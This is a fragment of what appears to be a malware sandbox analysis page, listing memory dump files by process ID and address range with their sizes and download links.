                                                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2712-1898-0x0000000000600000-0x0000000000678000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      480KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2712-750-0x0000000000600000-0x0000000000678000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      480KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2920-1985-0x0000000000400000-0x00000000004A4000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      656KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2920-512-0x0000000000400000-0x00000000004A4000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      656KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-117-0x0000000000410000-0x000000000041A000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                      Download

                                                                                                                                                                                                                                    • memory/2944-104-0x0000000001130000-0x00000000011A2000-memory.dmp

                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                      Download